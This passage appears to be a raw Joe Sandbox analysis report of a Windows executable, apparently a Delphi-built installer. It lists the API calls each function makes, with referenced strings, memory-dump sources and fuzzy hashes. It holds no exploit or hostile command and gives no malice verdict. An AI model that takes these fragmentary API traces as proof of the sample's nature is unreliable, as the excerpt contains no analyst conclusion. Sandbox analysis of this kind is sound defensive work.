                                                                          • RegisterClassA.USER32(004987AC), ref: 0042F42C
                                                                          • CreateWindowExA.USER32(00000000,TWindowDisabler-Window,0042F500,88000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0042F46A
                                                                          • CreateWindowExA.USER32(00000000,TWindowDisabler-Window,00000000,80000000,00000000,00000000,00000000,00000000,61736944,00000000,00400000,00000000), ref: 0042F4B0
                                                                          • ShowWindow.USER32(00000000,00000008,00000000,TWindowDisabler-Window,00000000,80000000,00000000,00000000,00000000,00000000,61736944,00000000,00400000,00000000,00000000,TWindowDisabler-Window), ref: 0042F4C1
                                                                          • SetFocus.USER32(00000000,00000000,0042F4E3,?,?,?,00000001,00000000,?,00457A52,00000000,0049A628), ref: 0042F4C8
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Window$CreateFocus$ActiveClassRegisterShow
                                                                          • String ID: TWindowDisabler-Window
                                                                          • API String ID: 3167913817-1824977358
                                                                          • Opcode ID: c7a7adc83155a0351196465afd34f02b227be391187f6a34a24c1e4424dacc7e
                                                                          • Instruction ID: a85808fe2fc477e6bfefb4b7344e4229cc17534778a3dce562db4a9d559d1a3d
                                                                          • Opcode Fuzzy Hash: c7a7adc83155a0351196465afd34f02b227be391187f6a34a24c1e4424dacc7e
                                                                          • Instruction Fuzzy Hash: 6921A371740710BAE220EF619D03F1B76A4EB14B44FA0813BF904AB2D1D7BC6D5486EE

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 2275 452850-4528a1 GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 2276 4528a3-4528aa 2275->2276 2277 4528ac-4528ae 2275->2277 2276->2277 2278 4528b0 2276->2278 2279 4528b2-4528e8 call 42e2bc call 42e73c call 403400 2277->2279 2278->2279
                                                                          APIs
                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,004528E9,?,?,?,?,00000000,?,004970C5), ref: 00452870
                                                                          • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00452876
                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,004528E9,?,?,?,?,00000000,?,004970C5), ref: 0045288A
                                                                          • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00452890
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: AddressHandleModuleProc
                                                                          • String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
                                                                          • API String ID: 1646373207-2130885113
                                                                          • Opcode ID: 5506a4263b1eff634ed0d2217251898cb45e1d8087d76cbb7271a2c362ce8048
                                                                          • Instruction ID: 1764834aba405073ceae9d3f2b1e241b80e40901185f6bd62a0f27775e5f306d
                                                                          • Opcode Fuzzy Hash: 5506a4263b1eff634ed0d2217251898cb45e1d8087d76cbb7271a2c362ce8048
                                                                          • Instruction Fuzzy Hash: DB0188B0300300EED701BBA29D03B9B3A58EB56725F50443BF80066287D7FC4909DABD
                                                                          APIs
                                                                          • SHGetFileInfo.SHELL32(c:\directory,00000010,?,00000160,00001010), ref: 0046693B
                                                                          • ExtractIconA.SHELL32(00400000,00000000,?), ref: 00466961
                                                                            • Part of subcall function 004667D8: DrawIconEx.USER32(00000000,00000000,00000000,00000000,00000020,00000020,00000000,00000000,00000003), ref: 00466870
                                                                            • Part of subcall function 004667D8: DestroyCursor.USER32(00000000), ref: 00466886
                                                                          • ExtractIconA.SHELL32(00400000,00000000,00000027), ref: 004669B8
                                                                          • SHGetFileInfo.SHELL32(00000000,00000000,?,00000160,00001000), ref: 00466A19
                                                                          • ExtractIconA.SHELL32(00400000,00000000,?), ref: 00466A3F
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Icon$Extract$FileInfo$CursorDestroyDraw
                                                                          • String ID: c:\directory$shell32.dll
                                                                          • API String ID: 3376378930-1375355148
                                                                          • Opcode ID: 7864bbd64ffcc0b4d3402a699463e3004b4bbc59a4beffd4c3fd38ea4829321b
                                                                          • Instruction ID: bf7570f26ded7c71d3219d2a7bb3c54f33771564a32a8265e6d4c0c3f8c9e6f1
                                                                          • Opcode Fuzzy Hash: 7864bbd64ffcc0b4d3402a699463e3004b4bbc59a4beffd4c3fd38ea4829321b
                                                                          • Instruction Fuzzy Hash: A1517070600248AFDB10DFA5CD89FDE77E9EB49344F5181B7B908AB351D638AE80CB59
                                                                          APIs
                                                                          • RegisterClipboardFormatA.USER32(commdlg_help), ref: 004307BC
                                                                          • RegisterClipboardFormatA.USER32(commdlg_FindReplace), ref: 004307CB
                                                                          • GetCurrentThreadId.KERNEL32 ref: 004307E5
                                                                          • GlobalAddAtomA.KERNEL32(00000000), ref: 00430806
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: ClipboardFormatRegister$AtomCurrentGlobalThread
                                                                          • String ID: WndProcPtr%.8X%.8X$commdlg_FindReplace$commdlg_help
                                                                          • API String ID: 4130936913-2943970505
                                                                          • Opcode ID: 286d819e49dc31bff7363ce272760638a3e9e634710abf7e83810de7db046942
                                                                          • Instruction ID: a6afac4a95f2c597deb8a3c09a724b63b9622156ea849986cff8ddd49ab29b56
                                                                          • Opcode Fuzzy Hash: 286d819e49dc31bff7363ce272760638a3e9e634710abf7e83810de7db046942
                                                                          • Instruction Fuzzy Hash: 68F082705583408ED700FB2588027197BE4EB98308F044A7FB498A62E1D77E8510CB9F
                                                                          APIs
                                                                          • GetLastError.KERNEL32(?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,?,COMMAND.COM" /C ,?,00454748,00454748,?,00454748,00000000), ref: 004546D6
                                                                          • CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,?,COMMAND.COM" /C ,?,00454748,00454748,?,00454748), ref: 004546E3
                                                                            • Part of subcall function 00454498: WaitForInputIdle.USER32(?,00000032), ref: 004544C4
                                                                            • Part of subcall function 00454498: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 004544E6
                                                                            • Part of subcall function 00454498: GetExitCodeProcess.KERNEL32(?,?), ref: 004544F5
                                                                            • Part of subcall function 00454498: CloseHandle.KERNEL32(?,00454522,0045451B,?,?,?,00000000,?,?,004546F7,?,?,?,00000044,00000000,00000000), ref: 00454515
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: CloseHandleWait$CodeErrorExitIdleInputLastMultipleObjectsProcess
                                                                          • String ID: .bat$.cmd$COMMAND.COM" /C $D$SuG$cmd.exe" /C "
                                                                          • API String ID: 854858120-3415487018
                                                                          • Opcode ID: 23eb109447d9d06895efbe1d143337b311b109ade6801299bf742d5fbdea7e55
                                                                          • Instruction ID: 0ceb2650e422503ffbc7ed56c7a183e4ec77644398bdd85e9c3e3b3e3b1edd4a
                                                                          • Opcode Fuzzy Hash: 23eb109447d9d06895efbe1d143337b311b109ade6801299bf742d5fbdea7e55
                                                                          • Instruction Fuzzy Hash: 17517F34A0034D6BCB01EF95C881BDDBBB9AF45309F51443BF8047B246D77C9A498759
                                                                          APIs
                                                                          • LoadIconA.USER32(00400000,MAINICON), ref: 0042372C
                                                                          • GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,00418FF6,00000000,?,?,?,00000001), ref: 00423759
                                                                          • OemToCharA.USER32(?,?), ref: 0042376C
                                                                          • CharLowerA.USER32(?,00400000,?,00000100,00400000,MAINICON,?,?,?,00418FF6,00000000,?,?,?,00000001), ref: 004237AC
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Char$FileIconLoadLowerModuleName
                                                                          • String ID: 2$MAINICON
                                                                          • API String ID: 3935243913-3181700818
                                                                          • Opcode ID: 74ccb24d7ebd2ab93e1510b14834e5329cf565851bcf20c48a8ce73befd404fd
                                                                          • Instruction ID: 37f11e164b18fdaff452b8e89fdec3e7ced50b804c3530562fc3ce32e09f0af8
                                                                          • Opcode Fuzzy Hash: 74ccb24d7ebd2ab93e1510b14834e5329cf565851bcf20c48a8ce73befd404fd
                                                                          • Instruction Fuzzy Hash: BF319370A042549ADF10EF2988857C67BE8AF14308F4441BAE844DB393D7BED988CB95
                                                                          APIs
                                                                          • GetCurrentProcessId.KERNEL32(00000000), ref: 00418F4D
                                                                          • GlobalAddAtomA.KERNEL32(00000000), ref: 00418F6E
                                                                          • GetCurrentThreadId.KERNEL32 ref: 00418F89
                                                                          • GlobalAddAtomA.KERNEL32(00000000), ref: 00418FAA
                                                                            • Part of subcall function 004230D8: 73A0A570.USER32(00000000,?,?,00000000,?,00418FE3,00000000,?,?,?,00000001), ref: 0042312E
                                                                            • Part of subcall function 004230D8: EnumFontsA.GDI32(00000000,00000000,00423078,00410660,00000000,?,?,00000000,?,00418FE3,00000000,?,?,?,00000001), ref: 00423141
                                                                            • Part of subcall function 004230D8: 73A14620.GDI32(00000000,0000005A,00000000,00000000,00423078,00410660,00000000,?,?,00000000,?,00418FE3,00000000), ref: 00423149
                                                                            • Part of subcall function 004230D8: 73A0A480.USER32(00000000,00000000,00000000,0000005A,00000000,00000000,00423078,00410660,00000000,?,?,00000000,?,00418FE3,00000000), ref: 00423154
                                                                            • Part of subcall function 0042369C: LoadIconA.USER32(00400000,MAINICON), ref: 0042372C
                                                                            • Part of subcall function 0042369C: GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,00418FF6,00000000,?,?,?,00000001), ref: 00423759
                                                                            • Part of subcall function 0042369C: OemToCharA.USER32(?,?), ref: 0042376C
                                                                            • Part of subcall function 0042369C: CharLowerA.USER32(?,00400000,?,00000100,00400000,MAINICON,?,?,?,00418FF6,00000000,?,?,?,00000001), ref: 004237AC
                                                                            • Part of subcall function 0041F128: GetVersion.KERNEL32(?,00419000,00000000,?,?,?,00000001), ref: 0041F136
                                                                            • Part of subcall function 0041F128: SetErrorMode.KERNEL32(00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F152
                                                                            • Part of subcall function 0041F128: LoadLibraryA.KERNEL32(CTL3D32.DLL,00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F15E
                                                                            • Part of subcall function 0041F128: SetErrorMode.KERNEL32(00000000,CTL3D32.DLL,00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F16C
                                                                            • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dRegister), ref: 0041F19C
                                                                            • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dUnregister), ref: 0041F1C5
                                                                            • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dSubclassCtl), ref: 0041F1DA
                                                                            • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dSubclassDlgEx), ref: 0041F1EF
                                                                            • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dDlgFramePaint), ref: 0041F204
                                                                            • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dCtlColorEx), ref: 0041F219
                                                                            • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dAutoSubclass), ref: 0041F22E
                                                                            • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dUnAutoSubclass), ref: 0041F243
                                                                            • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3DColorChange), ref: 0041F258
                                                                            • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,BtnWndProc3d), ref: 0041F26D
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: AddressProc$AtomCharCurrentErrorGlobalLoadMode$A14620A480A570EnumFileFontsIconLibraryLowerModuleNameProcessThreadVersion
                                                                          • String ID: ControlOfs%.8X%.8X$Delphi%.8X
                                                                          • API String ID: 3476490787-2767913252
                                                                          • Opcode ID: 4b1039f7c2ed13802eb740582532c433a8c58bd120a281f680ebe107a2bb77c7
                                                                          • Instruction ID: 8205fbe5be641bff71b9ea3a28b72145380c35a95610ff2efd46362842c0834c
                                                                          • Opcode Fuzzy Hash: 4b1039f7c2ed13802eb740582532c433a8c58bd120a281f680ebe107a2bb77c7
                                                                          • Instruction Fuzzy Hash: C1112EB06142409AC740FF76994268A7BE19B6431CF40943FF888EB2D1DB7D99548B5F
                                                                          APIs
                                                                          • SetWindowLongA.USER32(?,000000FC,?), ref: 00413674
                                                                          • GetWindowLongA.USER32(?,000000F0), ref: 0041367F
                                                                          • GetWindowLongA.USER32(?,000000F4), ref: 00413691
                                                                          • SetWindowLongA.USER32(?,000000F4,?), ref: 004136A4
                                                                          • SetPropA.USER32(?,00000000,00000000), ref: 004136BB
                                                                          • SetPropA.USER32(?,00000000,00000000), ref: 004136D2
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: LongWindow$Prop
                                                                          • String ID:
                                                                          • API String ID: 3887896539-0
                                                                          • Opcode ID: f3fe35187a7c1c9d5e5b286bbae8f081611be039bb05b0364af94d978d137136
                                                                          • Instruction ID: 1bc0ad651c9199286e8a44efdb6fe1d3d914d8875e882f3995fbdb6b4a12be9e
                                                                          • Opcode Fuzzy Hash: f3fe35187a7c1c9d5e5b286bbae8f081611be039bb05b0364af94d978d137136
                                                                          • Instruction Fuzzy Hash: BD11DD75500244BFDB00DF9DDC84E9A3BECEB19364F104676B918DB2A1D738D990CB94
                                                                          APIs
                                                                            • Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60
                                                                          • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,00454D8B,?,00000000,00454DCB), ref: 00454CD1
                                                                          Strings
                                                                          • PendingFileRenameOperations, xrefs: 00454C70
                                                                          • PendingFileRenameOperations2, xrefs: 00454CA0
                                                                          • WININIT.INI, xrefs: 00454D00
                                                                          • SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 00454C54
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: CloseOpen
                                                                          • String ID: PendingFileRenameOperations$PendingFileRenameOperations2$SYSTEM\CurrentControlSet\Control\Session Manager$WININIT.INI
                                                                          • API String ID: 47109696-2199428270
                                                                          • Opcode ID: 62d09565783996254d6c1bfa4da4febbe9c14bc97568f7b469f3c7b5dc2ee008
                                                                          • Instruction ID: ef280fa4ab6b1211fd8f84b8c583b28cf46e24a46f503c910aaa6e023c479b4e
                                                                          • Opcode Fuzzy Hash: 62d09565783996254d6c1bfa4da4febbe9c14bc97568f7b469f3c7b5dc2ee008
                                                                          • Instruction Fuzzy Hash: 7A51BD70E042089FDB11EF61DC51ADEB7B9EF84709F50857BE804BB282D7789E49CA58
                                                                          APIs
                                                                          • CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,00453173,?,?,00000000,0049A628,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004530CA
                                                                          • GetLastError.KERNEL32(00000000,00000000,?,00000000,00453173,?,?,00000000,0049A628,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004530D3
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: CreateDirectoryErrorLast
                                                                          • String ID: $pI$.tmp$oI
                                                                          • API String ID: 1375471231-740224434
                                                                          • Opcode ID: 2ce4d594e968045cfd634803865fb4a3602027d56f6b0184727ff020cea49090
                                                                          • Instruction ID: 60a70816440fe1ba2c2b61b043faaaddd8f2043f6f52677016a48fb96d3bd8e1
                                                                          • Opcode Fuzzy Hash: 2ce4d594e968045cfd634803865fb4a3602027d56f6b0184727ff020cea49090
                                                                          • Instruction Fuzzy Hash: 87211575A002089BDB01EFA5C8429DFB7B9EF48305F50457BE901B7382DA7C9F058BA9
                                                                          APIs
                                                                          • EnumWindows.USER32(00423A2C), ref: 00423AB8
                                                                          • GetWindow.USER32(?,00000003), ref: 00423ACD
                                                                          • GetWindowLongA.USER32(?,000000EC), ref: 00423ADC
                                                                          • SetWindowPos.USER32(00000000,lAB,00000000,00000000,00000000,00000000,00000013,?,000000EC,?,?,?,004241BB,?,?,00423D83), ref: 00423B12
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Window$EnumLongWindows
                                                                          • String ID: lAB
                                                                          • API String ID: 4191631535-3476862382
                                                                          • Opcode ID: 7be749a2765c1eff0868bc935b27b92e870f7d4112a7aa4dfcf15c251f2074d3
                                                                          • Instruction ID: d29b09d819a87149adbd2d005cf1232ad5b3f4e75eba8ff45bdb535110d2bb0d
                                                                          • Opcode Fuzzy Hash: 7be749a2765c1eff0868bc935b27b92e870f7d4112a7aa4dfcf15c251f2074d3
                                                                          • Instruction Fuzzy Hash: 3C115E70700610ABDB109F28DC85F5A77E8EB04725F50026AF9A49B2E7C378DD40CB59
                                                                          APIs
                                                                          • RegDeleteKeyA.ADVAPI32(00000000,00000000), ref: 0042DD78
                                                                          • GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,?,00000000,0042DF13,00000000,0042DF2B,?,?,?,?,00000006,?,00000000,00495CC7), ref: 0042DD93
                                                                          • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0042DD99
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: AddressDeleteHandleModuleProc
                                                                          • String ID: RegDeleteKeyExA$advapi32.dll
                                                                          • API String ID: 588496660-1846899949
                                                                          • Opcode ID: 56af588eaeb4f74fed5796c85cc7830cb4b9ca44c12d21c432fbdc1602fa1267
                                                                          • Instruction ID: 8fc99b955978393d7b704f32c9200af3e348b3abe20e6a9a0cbb7a4975712069
                                                                          • Opcode Fuzzy Hash: 56af588eaeb4f74fed5796c85cc7830cb4b9ca44c12d21c432fbdc1602fa1267
                                                                          • Instruction Fuzzy Hash: AFE022F0B91A30AAC72023A9BC4AFA32B28CF60725F985137F081B51D182BC0C40CE9C
                                                                          APIs
                                                                          • SetActiveWindow.USER32(?,?,00000000,00481781,?,?,00000001,?), ref: 0048157D
                                                                          • SHChangeNotify.SHELL32(08000000,00000000,00000000,00000000), ref: 004815F2
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: ActiveChangeNotifyWindow
                                                                          • String ID: $Need to restart Windows? %s
                                                                          • API String ID: 1160245247-4200181552
                                                                          • Opcode ID: ff41dacc05426b5765924d4bd3d38421e646fbffed63b1ad08012081094a3ca6
                                                                          • Instruction ID: 43b26af6fded3664f9a54b7664450519bbda0d3a266c0bb0bb586b013a774d9d
                                                                          • Opcode Fuzzy Hash: ff41dacc05426b5765924d4bd3d38421e646fbffed63b1ad08012081094a3ca6
                                                                          • Instruction Fuzzy Hash: 849191346002449FCB10FB69E986B9E77F5EF55308F0444BBE8109B362DB78A906CB5D
                                                                          APIs
